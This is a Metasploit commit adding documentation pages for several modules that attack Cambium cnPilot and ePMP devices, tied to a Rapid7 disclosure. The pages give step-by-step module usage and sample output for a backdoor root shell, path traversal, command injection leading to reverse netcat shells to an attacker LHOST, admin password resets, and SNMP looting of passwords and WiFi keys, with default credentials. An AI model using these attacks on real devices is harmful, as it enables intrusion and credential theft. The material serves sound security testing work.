Land rapid7#9316 Cambium modules and mixins, tx @juushya

These cover several of the CVEs mentioned in

https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/

Author: Tod Beardsley

documentation/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.md

@@ -0,0 +1,35 @@
+Cambium cnPilot r200/r201 device software versions 4.2.3-R4 and newer, contain an undocumented, backdoor 'root' shell. This shell is accessible via a specific url, to any authenticated user. The module uses this shell to execute arbitrary system commands as 'root'.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/cnpilot_r_cmd_exec```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```set CMD [command]```
+5. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/http/cnpilot_r_cmd_exec
+msf auxiliary(cnpilot_r_cmd_exec) > set RHOSTS 1.3.3.7
+msf auxiliary(cnpilot_r_cmd_exec) > set RPORT 80
+msf auxiliary(cnpilot_r_cmd_exec) > set CMD uname -a
+msf auxiliary(cnpilot_r_cmd_exec) > run
+
+[+] 1.3.3.7:80 - Cambium cnPilot confirmed...
+[*] 1.3.3.7:80 - Attempting to login...
+[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "user":"user"
+[*] 1.3.3.7:80 - Checking backdoor 'root' shell...
+[+] 1.3.3.7:80 - You can access the 'root' shell at: http://1.3.3.7:80/adm/syscmd.asp
+[+] 1.3.3.7:80 - Executing command - uname -a
+[+]
+Linux cnPilot-R201 2.6.36 #1 Thu Feb 9 03:02:39 CST 2017 mips unknown
+
+
+[+] File saved in: /root/.msf4/loot/20000000000003_default_1.3.3.7_cmdexeclog_12345.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+
+  ```

documentation/modules/auxiliary/admin/http/cnpilot_r_fpt.md

@@ -0,0 +1,31 @@
+This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200/r201 devices to read arbitrary files off the file system. Affected versions - 4.3.3-R4 and prior.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/cnpilot_r_fpt```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```set FILENAME [filename]```
+5. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/http/cnpilot_r_fpt
+msf auxiliary(cnpilot_r_fpt) > set RHOSTS 1.3.3.7
+msf auxiliary(cnpilot_r_fpt) > set RPORT 80
+msf auxiliary(cnpilot_r_fpt) > set FILENAME /etc/hosts
+msf auxiliary(cnpilot_r_fpt) > run
+
+[+] 1.3.3.7:80 - Cambium cnPilot confirmed...
+[*] 1.3.3.7:80 - Attempting to login...
+[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "user":"user"
+[*] 1.3.3.7:80 - Accessing the file...
+[+] 127.0.0.1 localhost.localdomain localhost
+
+[+] File saved in: /root/.msf4/loot/20000000000003_default_1.3.3.7_fptlog_12345.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+
+  ```

documentation/modules/auxiliary/admin/http/epmp1000_get_chart_cmd_exec.md

@@ -0,0 +1,30 @@
+This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (v3.1-3.5-RC7) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to execute arbitrary system commands. This module injects the payload in 'timestamp' parameter. Alternatively, a second, vulnerable parameter 'measure' can also be used.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```set CMD [COMMAND]```
+5. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/http/epmp1000_get_chart_cmd_exec
+msf auxiliary(epmp1000_get_chart_cmd_exec) > set rhosts 1.3.3.7
+msf auxiliary(epmp1000_get_chart_cmd_exec) > set rport 80
+msf auxiliary(epmp1000_get_chart_cmd_exec) > set CMD id; pwd
+msf auxiliary(epmp1000_get_chart_cmd_exec) > run
+
+[+] 1.3.3.7:80 - Running Cambium ePMP 1000 version 3.5...
+[*] 1.3.3.7:80 - Attempting to login...
+[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "installer":"installer"
+[*] 1.3.3.7:80 - Executing id; pwd
+uid=0(root) gid=0(root)
+/
+[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_default_1.3.3.7_ePMP_cmd_exec_12345.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+  ```

documentation/modules/auxiliary/admin/http/epmp1000_reset_pass.md

@@ -0,0 +1,30 @@
+This module exploits an access control vulnerability in Cambium ePMP device management portal. It requires any one of the following non-admin login credentials - installer/installer, home/home, readonly/readonly - to reset password of other existing user(s) including 'admin'. All versions <=3.5 (current as of today) are affected. The module has been tested on versions 3.0-3.5-RC7.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/epmp1000_reset_pass```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```set TARGET_USERNAME admin```
+5. Do: ```set NEW_PASSWORD newpass```
+6. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use use auxiliary/scanner/http/epmp1000_reset_pass
+msf auxiliary(epmp1000_reset_pass) > set rhosts 1.3.3.7
+msf auxiliary(epmp1000_reset_pass) > set rport 80
+msf auxiliary(epmp1000_reset_pass) > set TARGET_USERNAME admin
+msf auxiliary(epmp1000_reset_pass) > set NEW_PASSWORD newpass
+msf auxiliary(epmp1000_reset_pass) > run
+
+[+] 1.3.3.7:80 - Running Cambium ePMP version 3.5...
+[*] 1.3.3.7:80 - Attempting to login...
+[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "readonly":"readonly"
+[*] 1.3.3.7:80 - Changing password for admin to newpass
+[+] Password successfully changed!
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+  ```

documentation/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.md

@@ -0,0 +1,28 @@
+This module scans for Cambium cnPilot r200/r201 management login portal(s), attempts to identify valid credentials, and dump device configuration.
+
+The device has at least two (2) users - admin and user. Due to an access control vulnerability, it is possible for 'user' account to access full device config. All information, including passwords, and keys, is stored insecurely, in clear-text form, thus allowing unauthorized 'admin' access to any user.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/cnpilot_r_web_login_loot```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/http/cnpilot_r_web_login_loot
+msf auxiliary(cnpilot_r_web_login_loot) > set rhosts 1.3.3.7
+msf auxiliary(cnpilot_r_web_login_loot) > run
+
+[*] 1.3.3.7:80   - Cambium cnPilot confirmed...
+[+] 1.3.3.7:80   - Attempting to login...
+[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "admin":"admin"
+[*] 1.3.3.7:80 - dumping device configuration
+[+] 1.3.3.7:80 - Configfile.cfg retrieved successfully!
+[+] 1.3.3.7:80   - File saved in: /root/.msf4/loot/20000000000003_default_1.3.3.7_Configfile.cfg_12345.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+  ```

documentation/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.md

@@ -0,0 +1,55 @@
+Cambium cnPilot r200/r201 devices can be administered using SNMP. The device configuration contains IP addresses, keys, passwords, & lots of juicy information. This module exploits an access control flaw, which allows remotely extracting sensitive information such as account passwords, WiFI PSK, & SIP credentials via SNMP Read-Only (RO) community string.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/snmp/cnpilot_r_snmp_loot```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set COMMUNITY public```
+4. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/snmp/cnpilot_r_snmp_loot
+msf auxiliary(cnpilot_r_snmp_loot) > set rhosts 1.3.3.7
+msf auxiliary(cnpilot_r_snmp_loot) > run
+
+[+] 1.3.3.7, Connected.
+
+[*] Fetching System Information...
+
+[+] SNMP System Name: cnPilot R200P
+[+] SNMP System Description: cnPilot R200P 4.3.1-R1
+[+] Device UpTime: 666 days, 00:66:60.00
+[+] Hardware version: V1.3
+[+] Firmware version: 4.3.1-R1(201612201723)
+
+[*] Fetching Login Account Information...
+
+[+] Web Management Admin Login Name: admin
+[+] Web Management Admin Login Password: S3cr3t
+
+[*] Fetching SNMP Information...
+
+[+] SNMP read-only community name: public
+[+] SNMP read-write community name: private
+[+] SNMP Trap Community: trap
+[+] SNMP Trap Server IP Address:
+
+[*] Fetching WIFI Information...
+
+[+] Wireless Interface SSID: wifi_ssid
+[+] Wireless Interface Encryption Key: wifi_secret_key
+[+] Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): WPA2PSK
+
+[*] Fetching SIP Account Information...
+
+[+] SIP Account Number: 123456789
+[+] SIP Account Password: 123456789
+
+[+] Cambium cnPilot SNMP loot saved at /root/.msf4/loot/20000000000003_default_1.3.3.7_cambium_cnpilot__12345.txt
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+  ```

documentation/modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.md

@@ -0,0 +1,64 @@
+Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
+
+The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested on Cambium ePMP versions <=3.5.
+
+Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the number of THREADS.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/snmp/epmp1000_snmp_loot```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set COMMUNTY [SNMP_COMMUNUTY_STRING]```
+4. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/snmp/epmp_snmp_loot
+msf auxiliary(epmp_snmp_loot) > set rhosts 1.3.3.7
+msf auxiliary(epmp_snmp_loot) > set COMMUNITY private
+msf auxiliary(epmp_snmp_loot) > run
+
+msf auxiliary(epmp1000_snmp_loot) > run
+
+[*] Fetching System Information...
+
+[+] 1.3.3.7
+[+] SNMP System Name: Cambium
+[+] SNMP System Description: Cambium
+[+] Device UpTime: 0021:08:36:45
+[+] U-boot version: U-Boot 9350_PX 1.1.4.e (Feb 24 2016 - 20:14:38)
+
+[*] Fetching SNMP Information...
+
+[+] SNMP read-only community name: public
+[+] SNMP read-write community name: private
+[+] SNMP Trap Community: cambiumtrap
+[+] SNMP Trap Server IP Address: Null
+
+[*] Fetching WIFI Information...
+
+[+] Wireless Interface SSID: SSID
+[+] Wireless Interface Encryption Key: secretkey
+[+] Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): 2
+
+[*] Fetching WIFI Radius Information...
+
+[+] RADIUS server info:
+[+] RADIUS server port: Null
+[+] RADIUS server secret: Null
+[+] Wireless Radius Username: cambium-station
+[+] Wireless Radius Password: cambium
+
+[*] Fetching Network PPPoE Information...
+
+[+] Network PPPoE Service Name: temp
+[+] Network PPPoE Username: username
+[+] Network PPPoE Password: password
+
+[+] 1.3.3.7 - Cambium ePMP loot saved at /root/.msf4/loot/20000000000003_default_1.3.3.7_snmp_loot_000001.txt
+[+] 1.3.3.7 - Configuration backed-up for direct download at: http://1.3.3.7/dl/3.5_00000000000001.json
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+  ```

documentation/modules/exploit/linux/http/epmp1000_get_chart_cmd_shell.md

@@ -0,0 +1,42 @@
+This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to set up a reverse netcat shell. This module injects the payload in 'timestamp' parameter. Alternatively, a second, vulnerable parameter 'measure' can also be used. The module has been tested on versions 3.1-3.5-RC7.
+
+Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is stable. After the session is opened, there may be a slight delay in response after first command is issued. There are no delays in receiving responses to subsequent command(s). It is recommended to use 'exploit -j'.
+
+## Verification Steps
+
+1. Do: ```use exploit/unix/http/epmp1000_get_chart_cmd_shell```
+2. Do: ```set RHOST [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```set LHOST [IP]```
+5. Do: ```exploit -j```
+
+## Sample Output
+
+  ```
+msf > use use exploit/unix/http/epmp1000_get_chart_cmd_shell
+msf exploit(epmp1000_get_chart_cmd_shell) > set RHOST 192.168.0.2
+msf exploit(epmp1000_get_chart_cmd_shell) > set RPORT 80
+msf exploit(epmp1000_get_chart_cmd_shell) > set LHOST 192.168.0.104
+msf exploit(epmp1000_get_chart_cmd_shell) > exploit -j
+
+[*] Started reverse TCP handler on 192.168.0.104:4444
+[+] SUCCESSFUL LOGIN - 192.168.0.2:80 - "installer":"installer"
+[*] Sending payload...
+[*] Command shell session 5 opened (192.168.0.104:4444 -> 192.168.0.2:41941) at 2017-12-02 05:05:00 +0700
+
+msf exploit(epmp1000_get_chart_cmd_shell) > sessions -l
+
+Active sessions
+===============
+
+  Id  Type            Information  Connection
+  --  ----            -----------  ----------
+  5   shell cmd/unix               192.168.0.104:4444 -> 192.168.0.2:41941 (192.168.0.2)
+
+msf exploit(epmp1000_get_chart_cmd_shell) > sessions -i 5
+[*] Starting interaction with 5...
+
+id
+uid=0(root) gid=0(root)
+
+  ```

documentation/modules/exploit/linux/http/epmp1000_ping_cmd_shell.md

@@ -0,0 +1,44 @@
+This module exploits an OS Command Injection vulnerability in Cambium ePMP1000 device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to set up a reverse netcat shell.
+
+This module injects the payload in 'packets_num' parameter. Alternatively, a second, vulnerable parameter 'ping_ip' can also be used.
+
+Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is stable. After the session is opened, there may be a slight delay in response after first command is issued. There are no delays in receiving responses to subsequent command(s). It is recommended to use 'exploit -j'.
+
+## Verification Steps
+
+1. Do: ```use exploit/unix/http/epmp1000_ping_cmd_shell```
+2. Do: ```set RHOST [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```set LHOST [IP]```
+5. Do: ```exploit -j```
+
+## Sample Output
+
+  ```
+msf > use use exploit/unix/http/epmp1000_ping_cmd_shell
+msf exploit(epmp1000_ping_cmd_shell) > set RHOST 192.168.0.2
+msf exploit(epmp1000_ping_cmd_shell) > set RPORT 80
+msf exploit(epmp1000_ping_cmd_shell) > set LHOST 192.168.0.104
+msf exploit(epmp1000_ping_cmd_shell) > exploit -j
+
+[*] Started reverse TCP handler on 192.168.0.104:4444
+[+] SUCCESSFUL LOGIN - 192.168.0.2:80 - "installer":"installer"
+[*] Sending payload...
+[*] Command shell session 10 opened (192.168.0.104:4444 -> 192.168.0.2:43594) at 2017-12-02 06:08:00 +0700
+
+msf exploit(epmp1000_ping_cmd_shell) > sessions -l
+
+Active sessions
+===============
+
+  Id  Type            Information  Connection
+  --  ----            -----------  ----------
+  10   shell cmd/unix               192.168.0.104:4444 -> 192.168.0.2:43594 (192.168.0.2)
+
+msf exploit(epmp1000_ping_cmd_shell) > sessions -i 10
+[*] Starting interaction with 10...
+
+id
+uid=0(root) gid=0(root)
+
+  ```